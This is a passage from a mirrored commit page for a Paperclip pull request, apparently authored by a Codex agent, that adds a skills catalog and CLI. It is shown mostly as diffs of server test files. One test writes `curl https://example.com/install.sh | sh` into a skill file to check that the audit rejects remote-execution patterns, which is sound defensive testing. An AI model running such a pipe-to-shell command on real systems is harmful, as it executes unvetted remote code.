ake/paperclip
1
0
Fork 0
mirror of https://github.com/alkimake/paperclip.git synced 2026-06-14 01:50:39 +09:00
Code Issues Projects Releases Packages Wiki Activity

[codex] Add skills CLI and catalog management (#6782)

Browse source 
## Thinking Path

> - Paperclip orchestrates AI agents for zero-human companies through
company-scoped control-plane workflows.
> - Agents need reusable, inspectable skills that can be installed,
reset, audited, exported, and assigned without bespoke local setup.
> - The existing skill truth model needed cleanup so bundled skills,
optional catalog skills, runtime skills, and adapter-provided skills
have clear provenance.
> - Operators also need a practical CLI and board UI for discovering and
managing company skills.
> - This pull request adds the skills CLI, packaged skills catalog,
company skills APIs, and catalog-aware board UI.
> - The benefit is a more reusable Paperclip company setup where skills
are portable, auditable, and easier for operators and agents to manage.

## What Changed

- Added `paperclipai skills` CLI commands and coverage for catalog
listing, installing, resetting, and inspecting company skills.
- Added a packaged `@paperclipai/skills-catalog` workspace with bundled
and optional skill content plus validation/build tests.
- Added shared company-skill types and validators used across CLI,
server, and UI contracts.
- Added server catalog APIs/services for company skill catalog
operations, reset semantics, audit behavior, and portability provenance.
- Updated adapter skill handling so runtime/catalog provenance remains
explicit across local adapters.
- Added board UI support for browsing and managing catalog-backed
company skills.
- Updated docs for the skills CLI/catalog flow and the company skills
Paperclip skill reference.
- Rebased the branch onto current `paperclipai/paperclip:master`; no
`pnpm-lock.yaml`, `.github/workflows`, or migration files are included
in the final PR diff.

## Verification

- Passed: `pnpm run preflight:workspace-links && pnpm exec vitest run
cli/src/__tests__/skills.test.ts
packages/skills-catalog/src/catalog-builder.test.ts
packages/skills-catalog/src/shipped-catalog.test.ts
packages/shared/src/validators/company-skill.test.ts
packages/adapter-utils/src/server-utils.test.ts
packages/plugins/create-paperclip-plugin/src/entrypoints.test.ts
server/src/__tests__/company-skills-catalog-service.test.ts
server/src/__tests__/company-skills-routes.test.ts
server/src/__tests__/company-portability.test.ts`.
- Passed: `pnpm exec vitest run
server/src/__tests__/workspace-runtime.test.ts -t "default
branch|origin/master|symbolic-ref"`.
- Attempted: full `server/src/__tests__/workspace-runtime.test.ts`. Four
provisioning tests failed while seeding an isolated worktree database
from the local Paperclip instance because the local plugin schema dump
contains a duplicate-column foreign key
(`plugin_content_machine_18a7bc327b.content_case_signals`). The
default-branch tests touched by the rebase conflict passed in the
focused run above.
- Checked final diff: no `pnpm-lock.yaml`, no `.github/workflows`, and
no migration-file changes relative to `master`.

## Risks

- Medium: this is a broad skills/catalog change touching CLI, server
APIs, shared contracts, adapter skill sync, and UI.
- Catalog validation and reset semantics need careful reviewer attention
because they affect reusable company setup and portability.
- No database migrations are included in this PR, so there is no
migration ordering/idempotency risk in the final diff.
- No lockfile is included by design; dependency resolution will be
handled by the repository lockfile workflow.

## Model Used

- OpenAI Codex coding agent based on GPT-5, running in Paperclip via the
`codex_local` adapter with shell, git, GitHub CLI, and code-editing tool
access. Exact hosted model build/context-window metadata is not exposed
in this runtime.

## Checklist

- [x] I have included a thinking path that traces from project context
to this change
- [x] I have specified the model used (with version and capability
details)
- [x] I have checked ROADMAP.md and confirmed this PR does not duplicate
planned core work
- [x] I have run targeted tests locally and documented the local
workspace-runtime seed failure above
- [x] I have added or updated tests where applicable
- [x] If this change affects the UI, screenshots were intentionally
omitted per PAP-10124 instructions; UI behavior is covered by tests and
reviewer inspection
- [x] I have updated relevant documentation to reflect my changes
- [x] I have considered and documented any risks above
- [x] I will address all Greptile and reviewer comments before
requesting merge

---------

Co-authored-by: Paperclip <noreply@paperclip.ing>
This commit is contained in:
Dotta 2026-05-28 07:33:51 -10:00 committed by GitHub
parent 8da50dbcf8
commit 9eac727cf1
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
77 changed files with 9704 additions and 530 deletions
Download patch file Download diff file Expand all files Collapse all files

1
server/src/__tests__/acpx-local-skill-sync.test.ts
View file

@ -70,6 +70,7 @@ describe("acpx local skill sync", () => {
expect(snapshot.mode).toBe("unsupported");
expect(snapshot.desiredSkills).toContain(paperclipKey);
expect(snapshot.entries.find((entry) => entry.key === paperclipKey)?.desired).toBe(true);
expect(snapshot.entries.find((entry) => entry.key === paperclipKey)?.state).toBe("available");
expect(snapshot.entries.find((entry) => entry.key === paperclipKey)?.detail).toContain("stored in Paperclip only");
expect(snapshot.warnings).toContain(
"Custom ACP commands do not expose a Paperclip skill integration contract yet; selected skills are tracked only.",

11
server/src/__tests__/agent-skills-routes.test.ts
View file

@ -338,6 +338,9 @@ describe.sequential("agent skill routes", () => {
);
expect(res.status, JSON.stringify(res.body)).toBe(200);
expect(mockCompanySkillService.listRuntimeSkillEntries).toHaveBeenCalledWith("company-1", {
materializeMissing: false,
});
expect(mockAdapter.listSkills).toHaveBeenCalledWith(
expect.objectContaining({
adapterType: "claude_local",
@ -366,6 +369,9 @@ describe.sequential("agent skill routes", () => {
);
expect(res.status, JSON.stringify(res.body)).toBe(200);
expect(mockCompanySkillService.listRuntimeSkillEntries).toHaveBeenCalledWith("company-1", {
materializeMissing: false,
});
});
it("passes ACPX Claude config through the agent skill listing route", async () => {
@ -461,7 +467,7 @@ describe.sequential("agent skill routes", () => {
);
});
it("keeps runtime materialization for persistent skill adapters", async () => {
it("skips runtime materialization when listing persistent skill adapters", async () => {
mockAgentService.getById.mockResolvedValue(makeAgent("cursor"));
mockAdapter.listSkills.mockResolvedValue({
adapterType: "cursor",
@ -479,6 +485,9 @@ describe.sequential("agent skill routes", () => {
);
expect(res.status, JSON.stringify(res.body)).toBe(200);
expect(mockCompanySkillService.listRuntimeSkillEntries).toHaveBeenCalledWith("company-1", {
materializeMissing: false,
});
});
it("skips runtime materialization when syncing Claude skills", async () => {

100
server/src/__tests__/company-portability.test.ts
View file

@ -638,6 +638,106 @@ describe("company portability", () => {
expect(asTextFile(exported.files["skills/paperclipai/paperclip/paperclip/references/api.md"])).toContain("# API");
});
it("exports catalog skill provenance in portable Paperclip frontmatter", async () => {
const portability = companyPortabilityService({} as any);
const catalogKey = "paperclipai/bundled/software-development/review";
const originHash = "sha256:catalog-origin";
const catalogSkill = {
id: "skill-catalog",
companyId: "company-1",
key: catalogKey,
slug: "review",
name: "review",
description: "Catalog review skill",
markdown: "---\nname: review\ndescription: Catalog review skill\n---\n\n# Review\n",
sourceType: "catalog",
sourceLocator: "/tmp/paperclip/catalog/review",
sourceRef: originHash,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [
{ path: "SKILL.md", kind: "skill" },
{ path: "references/checklist.md", kind: "reference" },
],
metadata: {
sourceKind: "catalog",
skillKey: catalogKey,
catalogId: "paperclipai:bundled:software-development:review",
catalogKey,
catalogKind: "bundled",
catalogCategory: "software-development",
catalogPath: "catalog/bundled/software-development/review",
packageName: "@paperclipai/skills-catalog",
packageVersion: "0.3.1",
originHash,
originVersion: "0.3.1",
originSnapshotLocator: "/tmp/local-only-origin",
installedHash: "sha256:installed",
userModifiedAt: "2026-05-01T00:00:00.000Z",
updateHoldReason: "local_modifications",
auditVerdict: "warning",
auditCodes: ["local_modifications"],
auditScannedAt: "2026-05-02T00:00:00.000Z",
auditScanVersion: "skills-audit-v1",
},
};
companySkillSvc.listFull.mockResolvedValue([catalogSkill]);
companySkillSvc.readFile.mockImplementation(async (_companyId: string, skillId: string, relativePath: string) => ({
skillId,
path: relativePath,
kind: relativePath === "SKILL.md" ? "skill" : "reference",
content: relativePath === "SKILL.md"
? "---\nname: review\ndescription: Catalog review skill\n---\n\n# Review\n"
: "# Checklist\n",
language: "markdown",
markdown: true,
editable: true,
}));
const exported = await portability.exportBundle("company-1", {
include: {
company: false,
agents: false,
projects: false,
issues: false,
skills: true,
},
expandReferencedSkills: true,
});
const skillMarkdown = asTextFile(exported.files["skills/paperclipai/bundled/software-development/review/SKILL.md"]);
expect(skillMarkdown).toContain("paperclip:");
expect(skillMarkdown).toContain("catalog:");
expect(skillMarkdown).toContain(`sourceRef: "${originHash}"`);
expect(skillMarkdown).toContain('catalogId: "paperclipai:bundled:software-development:review"');
expect(skillMarkdown).toContain(`catalogKey: "${catalogKey}"`);
expect(skillMarkdown).toContain('catalogKind: "bundled"');
expect(skillMarkdown).toContain('catalogPath: "catalog/bundled/software-development/review"');
expect(skillMarkdown).toContain('packageName: "@paperclipai/skills-catalog"');
expect(skillMarkdown).toContain('packageVersion: "0.3.1"');
expect(skillMarkdown).toContain('installedHash: "sha256:installed"');
expect(skillMarkdown).toContain('auditVerdict: "warning"');
expect(skillMarkdown).not.toContain("originSnapshotLocator");
expect(exported.manifest.skills[0]).toMatchObject({
key: catalogKey,
sourceType: "catalog",
sourceRef: originHash,
metadata: expect.objectContaining({
sourceKind: "catalog",
skillKey: catalogKey,
originHash,
catalogId: "paperclipai:bundled:software-development:review",
catalogKey,
catalogKind: "bundled",
catalogPath: "catalog/bundled/software-development/review",
packageName: "@paperclipai/skills-catalog",
packageVersion: "0.3.1",
installedHash: "sha256:installed",
auditCodes: ["local_modifications"],
}),
});
});
it("exports only selected skills when skills filter is provided", async () => {
const portability = companyPortabilityService({} as any);

455
server/src/__tests__/company-skills-catalog-service.test.ts Normal file
View file

@ -0,0 +1,455 @@
import { createHash, randomUUID } from "node:crypto";
import os from "node:os";
import path from "node:path";
import { promises as fs } from "node:fs";
import { afterAll, afterEach, beforeAll, beforeEach, describe, expect, it, vi } from "vitest";
import { and, eq } from "drizzle-orm";
import { companies, companySkills, createDb } from "@paperclipai/db";
import {
getEmbeddedPostgresTestSupport,
startEmbeddedPostgresTestDatabase,
} from "./helpers/embedded-postgres.js";
import type { CatalogSkill, CatalogSkillFile } from "@paperclipai/shared";
function sha256(value: string | Buffer) {
return createHash("sha256").update(value).digest("hex");
}
function contentHash(files: CatalogSkillFile[]) {
const sortedFiles = [...files].sort((left, right) => {
if (left.path === "SKILL.md") return -1;
if (right.path === "SKILL.md") return 1;
return left.path.localeCompare(right.path);
});
return `sha256:${sha256(Buffer.from(JSON.stringify(sortedFiles.map((file) => ({
path: file.path,
sha256: file.sha256,
})))))}`;
}
const sampleSkillMarkdown = "---\nname: review\n---\n\n# Review\n";
const sampleReferenceMarkdown = "# Checklist\n";
const sampleAssetBytes = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x00, 0xff, 0x10]);
const sampleFiles: CatalogSkillFile[] = [
{ path: "SKILL.md", kind: "skill", sizeBytes: Buffer.byteLength(sampleSkillMarkdown), sha256: sha256(sampleSkillMarkdown) },
{ path: "references/checklist.md", kind: "reference", sizeBytes: Buffer.byteLength(sampleReferenceMarkdown), sha256: sha256(sampleReferenceMarkdown) },
];
const sampleCatalogSkill: CatalogSkill = {
id: "paperclipai:bundled:software-development:review",
key: "paperclipai/bundled/software-development/review",
kind: "bundled",
category: "software-development",
slug: "review",
name: "review",
description: "Review code",
path: "catalog/bundled/software-development/review",
entrypoint: "SKILL.md",
trustLevel: "markdown_only",
compatibility: "compatible",
defaultInstall: false,
recommendedForRoles: ["engineer"],
requires: [],
tags: ["review"],
files: sampleFiles,
contentHash: contentHash(sampleFiles),
};
const mockCatalogService = vi.hoisted(() => ({
getCatalogPackageMetadata: vi.fn(() => ({
packageName: "@paperclipai/skills-catalog",
packageVersion: "0.3.1",
})),
getCatalogSkillOrThrow: vi.fn(),
resolveCatalogSkillReference: vi.fn(),
readCatalogSkillFile: vi.fn(),
copyCatalogSkillFile: vi.fn(),
}));
vi.doMock("../services/skills-catalog.js", () => mockCatalogService);
const embeddedPostgresSupport = await getEmbeddedPostgresTestSupport();
const describeEmbeddedPostgres = embeddedPostgresSupport.supported ? describe : describe.skip;
if (!embeddedPostgresSupport.supported) {
console.warn(
`Skipping embedded Postgres company skill catalog service tests on this host: ${embeddedPostgresSupport.reason ?? "unsupported environment"}`,
);
}
describeEmbeddedPostgres("companySkillService.installFromCatalog", () => {
let db!: ReturnType<typeof createDb>;
let svc!: Awaited<ReturnType<typeof createService>>;
let tempDb: Awaited<ReturnType<typeof startEmbeddedPostgresTestDatabase>> | null = null;
let oldPaperclipHome: string | undefined;
const cleanupDirs = new Set<string>();
async function createService() {
const { companySkillService } = await import("../services/company-skills.js");
return companySkillService(db);
}
async function createCompany() {
const companyId = randomUUID();
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
return companyId;
}
beforeAll(async () => {
oldPaperclipHome = process.env.PAPERCLIP_HOME;
tempDb = await startEmbeddedPostgresTestDatabase("paperclip-company-skills-catalog-");
db = createDb(tempDb.connectionString);
svc = await createService();
}, 20_000);
beforeEach(async () => {
const home = await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-catalog-home-"));
cleanupDirs.add(home);
process.env.PAPERCLIP_HOME = home;
mockCatalogService.getCatalogSkillOrThrow.mockReturnValue(sampleCatalogSkill);
mockCatalogService.resolveCatalogSkillReference.mockReturnValue({
skill: sampleCatalogSkill,
ambiguous: false,
});
mockCatalogService.readCatalogSkillFile.mockImplementation(async (_ref: string, filePath: string) => ({
catalogSkillId: sampleCatalogSkill.id,
path: filePath,
kind: filePath === "SKILL.md" ? "skill" : "reference",
content: filePath === "SKILL.md" ? sampleSkillMarkdown : sampleReferenceMarkdown,
language: "markdown",
markdown: true,
}));
mockCatalogService.copyCatalogSkillFile.mockImplementation(async (_ref: string, filePath: string, targetPath: string) => {
const content = filePath === "SKILL.md" ? sampleSkillMarkdown : sampleReferenceMarkdown;
await fs.writeFile(targetPath, content, "utf8");
});
});
afterEach(async () => {
await db.delete(companySkills);
await db.delete(companies);
await Promise.all(Array.from(cleanupDirs, (dir) => fs.rm(dir, { recursive: true, force: true })));
cleanupDirs.clear();
vi.clearAllMocks();
});
afterAll(async () => {
if (oldPaperclipHome === undefined) delete process.env.PAPERCLIP_HOME;
else process.env.PAPERCLIP_HOME = oldPaperclipHome;
await tempDb?.cleanup();
});
it("creates a company skill with catalog provenance and materialized files", async () => {
const companyId = await createCompany();
const result = await svc.installFromCatalog(companyId, {
catalogSkillId: sampleCatalogSkill.id,
});
expect(result.action).toBe("created");
expect(result.skill).toMatchObject({
companyId,
key: sampleCatalogSkill.key,
slug: sampleCatalogSkill.slug,
sourceType: "catalog",
sourceRef: sampleCatalogSkill.contentHash,
trustLevel: "markdown_only",
compatibility: "compatible",
metadata: expect.objectContaining({
sourceKind: "catalog",
catalogId: sampleCatalogSkill.id,
catalogKey: sampleCatalogSkill.key,
catalogKind: "bundled",
catalogCategory: "software-development",
packageName: "@paperclipai/skills-catalog",
originHash: sampleCatalogSkill.contentHash,
installedHash: sampleCatalogSkill.contentHash,
auditVerdict: "pass",
auditScanVersion: "skills-audit-v1",
}),
});
await expect(fs.readFile(path.join(result.skill.sourceLocator!, "SKILL.md"), "utf8")).resolves.toBe(sampleSkillMarkdown);
await expect(fs.readFile(path.join(result.skill.sourceLocator!, "references/checklist.md"), "utf8")).resolves.toBe(sampleReferenceMarkdown);
const listed = await svc.list(companyId);
expect(listed.find((skill) => skill.id === result.skill.id)).toMatchObject({
catalogKind: "bundled",
originHash: sampleCatalogSkill.contentHash,
packageName: "@paperclipai/skills-catalog",
packageVersion: "0.3.1",
});
});
it("materializes catalog asset files without UTF-8 rewriting", async () => {
const assetFiles: CatalogSkillFile[] = [
...sampleFiles,
{ path: "assets/logo.png", kind: "asset", sizeBytes: sampleAssetBytes.length, sha256: sha256(sampleAssetBytes) },
];
const assetCatalogSkill: CatalogSkill = {
...sampleCatalogSkill,
trustLevel: "assets",
files: assetFiles,
contentHash: contentHash(assetFiles),
};
mockCatalogService.getCatalogSkillOrThrow.mockReturnValue(assetCatalogSkill);
mockCatalogService.copyCatalogSkillFile.mockImplementation(async (_ref: string, filePath: string, targetPath: string) => {
if (filePath === "assets/logo.png") {
await fs.writeFile(targetPath, sampleAssetBytes);
return;
}
const content = filePath === "SKILL.md" ? sampleSkillMarkdown : sampleReferenceMarkdown;
await fs.writeFile(targetPath, content, "utf8");
});
const companyId = await createCompany();
const result = await svc.installFromCatalog(companyId, {
catalogSkillId: assetCatalogSkill.id,
});
await expect(fs.readFile(path.join(result.skill.sourceLocator!, "assets/logo.png"))).resolves.toEqual(sampleAssetBytes);
await expect(svc.installUpdate(companyId, result.skill.id)).resolves.toMatchObject({
metadata: expect.objectContaining({
updateHoldReason: null,
}),
});
await expect(svc.resetSkill(companyId, result.skill.id)).resolves.toMatchObject({
metadata: expect.objectContaining({
updateHoldReason: null,
}),
});
});
it("restores portable catalog provenance when importing packaged skills", async () => {
const companyId = await createCompany();
const importedFiles = {
"skills/paperclipai/bundled/software-development/review/SKILL.md": [
"---",
`key: "${sampleCatalogSkill.key}"`,
'slug: "review"',
'name: "review"',
"metadata:",
" paperclip:",
` skillKey: "${sampleCatalogSkill.key}"`,
' slug: "review"',
" catalog:",
` skillKey: "${sampleCatalogSkill.key}"`,
` sourceRef: "${sampleCatalogSkill.contentHash}"`,
` originHash: "${sampleCatalogSkill.contentHash}"`,
` catalogId: "${sampleCatalogSkill.id}"`,
` catalogKey: "${sampleCatalogSkill.key}"`,
' catalogKind: "bundled"',
' catalogPath: "catalog/bundled/software-development/review"',
' packageName: "@paperclipai/skills-catalog"',
' packageVersion: "0.3.1"',
` installedHash: "${sampleCatalogSkill.contentHash}"`,
' userModifiedAt: "2026-05-01T00:00:00.000Z"',
' updateHoldReason: "local_modifications"',
' auditVerdict: "warning"',
" auditCodes:",
' - "local_modifications"',
' auditScannedAt: "2026-05-02T00:00:00.000Z"',
' auditScanVersion: "skills-audit-v1"',
"---",
"",
"# Review",
"",
].join("\n"),
"skills/paperclipai/bundled/software-development/review/references/checklist.md": sampleReferenceMarkdown,
};
const [result] = await svc.importPackageFiles(companyId, importedFiles, { onConflict: "replace" });
expect(result?.action).toBe("created");
expect(result?.skill).toMatchObject({
companyId,
key: sampleCatalogSkill.key,
slug: "review",
sourceType: "catalog",
sourceRef: sampleCatalogSkill.contentHash,
metadata: expect.objectContaining({
sourceKind: "catalog",
skillKey: sampleCatalogSkill.key,
originHash: sampleCatalogSkill.contentHash,
catalogId: sampleCatalogSkill.id,
catalogKey: sampleCatalogSkill.key,
catalogKind: "bundled",
catalogPath: "catalog/bundled/software-development/review",
packageName: "@paperclipai/skills-catalog",
packageVersion: "0.3.1",
installedHash: sampleCatalogSkill.contentHash,
userModifiedAt: "2026-05-01T00:00:00.000Z",
updateHoldReason: "local_modifications",
auditVerdict: "warning",
auditCodes: ["local_modifications"],
auditScannedAt: "2026-05-02T00:00:00.000Z",
auditScanVersion: "skills-audit-v1",
}),
});
expect(result?.skill.sourceLocator).toEqual(expect.any(String));
await expect(fs.readFile(path.join(result!.skill.sourceLocator!, "SKILL.md"), "utf8")).resolves.toContain("# Review");
});
it("returns unchanged for an already-current catalog skill", async () => {
const companyId = await createCompany();
await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
const result = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
expect(result.action).toBe("unchanged");
expect(result.skill.metadata).toEqual(expect.objectContaining({
installedHash: sampleCatalogSkill.contentHash,
auditVerdict: "pass",
auditScanVersion: "skills-audit-v1",
}));
const rows = await db
.select()
.from(companySkills)
.where(and(eq(companySkills.companyId, companyId), eq(companySkills.key, sampleCatalogSkill.key)));
expect(rows).toHaveLength(1);
});
it("detects installed catalog drift during update checks", async () => {
const companyId = await createCompany();
const installed = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
await fs.writeFile(path.join(installed.skill.sourceLocator!, "SKILL.md"), `${sampleSkillMarkdown}\nTampered\n`, "utf8");
const status = await svc.updateStatus(companyId, installed.skill.id);
expect(status).toMatchObject({
supported: true,
originHash: sampleCatalogSkill.contentHash,
updateHoldReason: "local_modifications",
auditVerdict: "warning",
});
expect(status?.installedHash).not.toBe(sampleCatalogSkill.contentHash);
});
it("returns unsupported update status when the catalog entry is no longer shipped", async () => {
const companyId = await createCompany();
const installed = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
mockCatalogService.resolveCatalogSkillReference.mockReturnValue({
skill: null,
ambiguous: false,
});
const status = await svc.updateStatus(companyId, installed.skill.id);
expect(status).toMatchObject({
supported: false,
reason: "Catalog entry is no longer available in the shipped manifest.",
trackingRef: sampleCatalogSkill.id,
latestRef: null,
hasUpdate: false,
});
});
it("clears stale local modification hold status when catalog files are restored", async () => {
const companyId = await createCompany();
const installed = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
const skillPath = path.join(installed.skill.sourceLocator!, "SKILL.md");
await fs.writeFile(skillPath, `${sampleSkillMarkdown}\nTampered\n`, "utf8");
await svc.auditSkill(companyId, installed.skill.id);
await fs.writeFile(skillPath, sampleSkillMarkdown, "utf8");
const status = await svc.updateStatus(companyId, installed.skill.id);
expect(status).toMatchObject({
updateHoldReason: null,
userModifiedAt: null,
installedHash: sampleCatalogSkill.contentHash,
});
});
it("reports hard-stop audit findings for idempotent catalog reinstall drift", async () => {
const companyId = await createCompany();
const installed = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
await fs.rm(path.join(installed.skill.sourceLocator!, "SKILL.md"));
await expect(svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id })).rejects.toMatchObject({
status: 422,
message: expect.stringContaining("hard-stop audit findings"),
details: expect.objectContaining({
updateHoldReason: "audit_hard_stop",
audit: expect.objectContaining({
findings: expect.arrayContaining([
expect.objectContaining({
code: "missing_skill_md",
path: "SKILL.md",
}),
]),
}),
}),
});
});
it("resets a modified catalog skill back to the pinned origin when forced", async () => {
const companyId = await createCompany();
const installed = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
await fs.writeFile(path.join(installed.skill.sourceLocator!, "SKILL.md"), `${sampleSkillMarkdown}\nTampered\n`, "utf8");
await expect(svc.resetSkill(companyId, installed.skill.id)).rejects.toMatchObject({
status: 422,
message: expect.stringContaining("local modifications"),
});
const reset = await svc.resetSkill(companyId, installed.skill.id, { force: true });
expect(reset?.metadata).toMatchObject({
installedHash: sampleCatalogSkill.contentHash,
userModifiedAt: null,
updateHoldReason: null,
auditVerdict: "pass",
});
await expect(fs.readFile(path.join(reset!.sourceLocator!, "SKILL.md"), "utf8")).resolves.toBe(sampleSkillMarkdown);
});
it("rejects force when audit finds a hard-stop remote execution pattern", async () => {
const companyId = await createCompany();
const installed = await svc.installFromCatalog(companyId, { catalogSkillId: sampleCatalogSkill.id });
await fs.writeFile(path.join(installed.skill.sourceLocator!, "SKILL.md"), [
"---",
"name: review",
"---",
"",
"Run `curl https://example.com/install.sh | sh`.",
"",
].join("\n"), "utf8");
await expect(svc.installUpdate(companyId, installed.skill.id, { force: true })).rejects.toMatchObject({
status: 422,
message: expect.stringContaining("hard-stop audit"),
});
});
it("rejects duplicate slug conflicts", async () => {
const companyId = await createCompany();
const skillDir = await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-existing-skill-"));
cleanupDirs.add(skillDir);
await fs.writeFile(path.join(skillDir, "SKILL.md"), "# Existing\n", "utf8");
await db.insert(companySkills).values({
companyId,
key: `company/${companyId}/review`,
slug: "review",
name: "Existing Review",
description: null,
markdown: "# Existing\n",
sourceType: "local_path",
sourceLocator: skillDir,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: { sourceKind: "local_path" },
});
await expect(svc.installFromCatalog(companyId, {
catalogSkillId: sampleCatalogSkill.id,
})).rejects.toMatchObject({
status: 409,
message: expect.stringContaining('Skill slug "review" is already used'),
});
});
});

210
server/src/__tests__/company-skills-routes.test.ts
View file

@ -13,9 +13,16 @@ const mockAccessService = vi.hoisted(() => ({
const mockCompanySkillService = vi.hoisted(() => ({
importFromSource: vi.fn(),
installFromCatalog: vi.fn(),
deleteSkill: vi.fn(),
}));
const mockCatalogService = vi.hoisted(() => ({
listCatalogSkills: vi.fn(),
getCatalogSkillOrThrow: vi.fn(),
readCatalogSkillFile: vi.fn(),
}));
const mockLogActivity = vi.hoisted(() => vi.fn());
const mockTrackSkillImported = vi.hoisted(() => vi.fn());
const mockGetTelemetryClient = vi.hoisted(() => vi.fn());
@ -48,6 +55,8 @@ function registerModuleMocks() {
companySkillService: () => mockCompanySkillService,
}));
vi.doMock("../services/skills-catalog.js", () => mockCatalogService);
vi.doMock("../services/index.js", () => ({
accessService: () => mockAccessService,
agentService: () => mockAgentService,
@ -81,6 +90,7 @@ describe("company skill mutation permissions", () => {
vi.doUnmock("../services/activity-log.js");
vi.doUnmock("../services/agents.js");
vi.doUnmock("../services/company-skills.js");
vi.doUnmock("../services/skills-catalog.js");
vi.doUnmock("../services/index.js");
vi.doUnmock("../routes/company-skills.js");
vi.doUnmock("../routes/authz.js");
@ -92,11 +102,84 @@ describe("company skill mutation permissions", () => {
imported: [],
warnings: [],
});
mockCompanySkillService.installFromCatalog.mockResolvedValue({
action: "created",
skill: {
id: "skill-1",
companyId: "company-1",
key: "paperclipai/bundled/software-development/review",
slug: "review",
name: "review",
description: "Review code",
markdown: "# Review",
sourceType: "catalog",
sourceLocator: "/tmp/review",
sourceRef: "sha256:abc",
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: {
sourceKind: "catalog",
catalogId: "paperclipai:bundled:software-development:review",
originHash: "sha256:abc",
},
createdAt: new Date("2026-05-26T00:00:00.000Z"),
updatedAt: new Date("2026-05-26T00:00:00.000Z"),
},
catalogSkill: {
id: "paperclipai:bundled:software-development:review",
key: "paperclipai/bundled/software-development/review",
kind: "bundled",
category: "software-development",
slug: "review",
name: "review",
description: "Review code",
path: "catalog/bundled/software-development/review",
entrypoint: "SKILL.md",
trustLevel: "markdown_only",
compatibility: "compatible",
defaultInstall: false,
recommendedForRoles: ["engineer"],
requires: [],
tags: ["review"],
files: [{ path: "SKILL.md", kind: "skill", sizeBytes: 8, sha256: "abc" }],
contentHash: "sha256:abc",
},
warnings: [],
});
mockCompanySkillService.deleteSkill.mockResolvedValue({
id: "skill-1",
slug: "find-skills",
name: "Find Skills",
});
mockCatalogService.listCatalogSkills.mockReturnValue([]);
mockCatalogService.getCatalogSkillOrThrow.mockReturnValue({
id: "paperclipai:bundled:software-development:review",
key: "paperclipai/bundled/software-development/review",
kind: "bundled",
category: "software-development",
slug: "review",
name: "review",
description: "Review code",
path: "catalog/bundled/software-development/review",
entrypoint: "SKILL.md",
trustLevel: "markdown_only",
compatibility: "compatible",
defaultInstall: false,
recommendedForRoles: ["engineer"],
requires: [],
tags: ["review"],
files: [{ path: "SKILL.md", kind: "skill", sizeBytes: 8, sha256: "abc" }],
contentHash: "sha256:abc",
});
mockCatalogService.readCatalogSkillFile.mockResolvedValue({
catalogSkillId: "paperclipai:bundled:software-development:review",
path: "SKILL.md",
kind: "skill",
content: "# Review",
language: "markdown",
markdown: true,
});
mockLogActivity.mockResolvedValue(undefined);
mockAccessService.canUser.mockResolvedValue(true);
mockAccessService.hasPermission.mockResolvedValue(false);
@ -120,6 +203,113 @@ describe("company skill mutation permissions", () => {
});
});
it("serves catalog listing without mutating company skills", async () => {
mockCatalogService.listCatalogSkills.mockReturnValue([
{
id: "paperclipai:bundled:software-development:review",
key: "paperclipai/bundled/software-development/review",
kind: "bundled",
category: "software-development",
slug: "review",
name: "review",
description: "Review code",
path: "catalog/bundled/software-development/review",
entrypoint: "SKILL.md",
trustLevel: "markdown_only",
compatibility: "compatible",
defaultInstall: false,
recommendedForRoles: ["engineer"],
requires: [],
tags: ["review"],
files: [{ path: "SKILL.md", kind: "skill", sizeBytes: 8, sha256: "abc" }],
contentHash: "sha256:abc",
},
]);
const res = await request(await createApp({
type: "board",
userId: "local-board",
companyIds: ["company-1"],
source: "local_implicit",
isInstanceAdmin: false,
}))
.get("/api/skills/catalog?kind=bundled&q=review");
expect(res.status, JSON.stringify(res.body)).toBe(200);
expect(mockCatalogService.listCatalogSkills).toHaveBeenCalledWith({ kind: "bundled", q: "review" });
expect(mockCompanySkillService.importFromSource).not.toHaveBeenCalled();
expect(mockCompanySkillService.installFromCatalog).not.toHaveBeenCalled();
expect(mockLogActivity).not.toHaveBeenCalled();
});
it("requires authentication for catalog read routes", async () => {
const app = await createApp({ type: "none" });
const list = await request(app).get("/api/skills/catalog");
const detail = await request(app).get("/api/skills/catalog/review");
const file = await request(app).get("/api/skills/catalog/review/files?path=SKILL.md");
expect(list.status, JSON.stringify(list.body)).toBe(401);
expect(detail.status, JSON.stringify(detail.body)).toBe(401);
expect(file.status, JSON.stringify(file.body)).toBe(401);
expect(mockCatalogService.listCatalogSkills).not.toHaveBeenCalled();
expect(mockCatalogService.getCatalogSkillOrThrow).not.toHaveBeenCalled();
expect(mockCatalogService.readCatalogSkillFile).not.toHaveBeenCalled();
});
it("serves catalog detail and files by catalog reference", async () => {
const app = await createApp({
type: "board",
userId: "local-board",
companyIds: ["company-1"],
source: "local_implicit",
isInstanceAdmin: false,
});
const detail = await request(app)
.get("/api/skills/catalog/review");
const file = await request(app)
.get("/api/skills/catalog/review/files?path=SKILL.md");
expect(detail.status, JSON.stringify(detail.body)).toBe(200);
expect(file.status, JSON.stringify(file.body)).toBe(200);
expect(mockCatalogService.getCatalogSkillOrThrow).toHaveBeenCalledWith("review");
expect(mockCatalogService.readCatalogSkillFile).toHaveBeenCalledWith("review", "SKILL.md");
expect(mockLogActivity).not.toHaveBeenCalled();
});
it("installs catalog skills with mutation permissions and logs provenance", async () => {
const res = await request(await createApp({
type: "board",
userId: "local-board",
companyIds: ["company-1"],
source: "local_implicit",
isInstanceAdmin: false,
}))
.post("/api/companies/company-1/skills/install-catalog")
.send({
